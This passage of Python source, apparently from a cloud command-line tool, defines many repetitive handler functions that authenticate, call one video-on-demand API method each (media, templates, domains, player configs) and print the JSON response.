model = models.DescribeCDNStatDetailsRequest()
model.from_json_string(json.dumps(args))
rsp = client.DescribeCDNStatDetails(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doModifyImageSpriteTemplate(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ModifyImageSpriteTemplateRequest()
model.from_json_string(json.dumps(args))
rsp = client.ModifyImageSpriteTemplate(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDeleteClass(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DeleteClassRequest()
model.from_json_string(json.dumps(args))
rsp = client.DeleteClass(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doExecuteFunction(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ExecuteFunctionRequest()
model.from_json_string(json.dumps(args))
rsp = client.ExecuteFunction(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDeleteVodDomain(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DeleteVodDomainRequest()
model.from_json_string(json.dumps(args))
rsp = client.DeleteVodDomain(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeMediaProcessUsageData(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeMediaProcessUsageDataRequest()
model.from_json_string(json.dumps(args))
rsp = client.DescribeMediaProcessUsageData(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doConfirmEvents(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ConfirmEventsRequest()
model.from_json_string(json.dumps(args))
rsp = client.ConfirmEvents(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doComposeMedia(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ComposeMediaRequest()
model.from_json_string(json.dumps(args))
rsp = client.ComposeMedia(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doCreateContentReviewTemplate(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.CreateContentReviewTemplateRequest()
model.from_json_string(json.dumps(args))
rsp = client.CreateContentReviewTemplate(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doCreateSampleSnapshotTemplate(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.CreateSampleSnapshotTemplateRequest()
model.from_json_string(json.dumps(args))
rsp = client.CreateSampleSnapshotTemplate(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDeleteAIAnalysisTemplate(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DeleteAIAnalysisTemplateRequest()
model.from_json_string(json.dumps(args))
rsp = client.DeleteAIAnalysisTemplate(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeMediaInfos(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeMediaInfosRequest()
model.from_json_string(json.dumps(args))
rsp = client.DescribeMediaInfos(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doLiveRealTimeClip(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.LiveRealTimeClipRequest()
model.from_json_string(json.dumps(args))
rsp = client.LiveRealTimeClip(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doPullUpload(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.PullUploadRequest()
model.from_json_string(json.dumps(args))
rsp = client.PullUpload(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doModifySampleSnapshotTemplate(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ModifySampleSnapshotTemplateRequest()
model.from_json_string(json.dumps(args))
rsp = client.ModifySampleSnapshotTemplate(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doModifyVodDomainAccelerateConfig(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ModifyVodDomainAccelerateConfigRequest()
model.from_json_string(json.dumps(args))
rsp = client.ModifyVodDomainAccelerateConfig(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDeleteSuperPlayerConfig(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DeleteSuperPlayerConfigRequest()
model.from_json_string(json.dumps(args))
rsp = client.DeleteSuperPlayerConfig(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeProcedureTemplates(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeProcedureTemplatesRequest()
model.from_json_string(json.dumps(args))
rsp = client.DescribeProcedureTemplates(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeTranscodeTemplates(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeTranscodeTemplatesRequest()
model.from_json_string(json.dumps(args))
rsp = client.DescribeTranscodeTemplates(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doParseStreamingManifest(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ParseStreamingManifestRequest()
model.from_json_string(json.dumps(args))
rsp = client.ParseStreamingManifest(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doCreateProcedureTemplate(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.CreateProcedureTemplateRequest()
model.from_json_string(json.dumps(args))
rsp = client.CreateProcedureTemplate(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doPushUrlCache(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.PushUrlCacheRequest()
model.from_json_string(json.dumps(args))
rsp = client.PushUrlCache(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDeleteMedia(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DeleteMediaRequest()
model.from_json_string(json.dumps(args))
rsp = client.DeleteMedia(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doCreateSuperPlayerConfig(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.CreateSuperPlayerConfigRequest()
model.from_json_string(json.dumps(args))
rsp = client.CreateSuperPlayerConfig(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doModifyPersonSample(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ModifyPersonSampleRequest()
model.from_json_string(json.dumps(args))
rsp = client.ModifyPersonSample(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDeleteContentReviewTemplate(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DeleteContentReviewTemplateRequest()
model.from_json_string(json.dumps(args))
rsp = client.DeleteContentReviewTemplate(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doCreateAIAnalysisTemplate(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.CreateAIAnalysisTemplateRequest()
model.from_json_string(json.dumps(args))
rsp = client.CreateAIAnalysisTemplate(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doModifyVodDomainConfig(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ModifyVodDomainConfigRequest()
model.from_json_string(json.dumps(args))
rsp = client.ModifyVodDomainConfig(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeSnapshotByTimeOffsetTemplates(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeSnapshotByTimeOffsetTemplatesRequest()
model.from_json_string(json.dumps(args))
rsp = client.DescribeSnapshotByTimeOffsetTemplates(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doProcessMediaByUrl(args, parsed_globals):
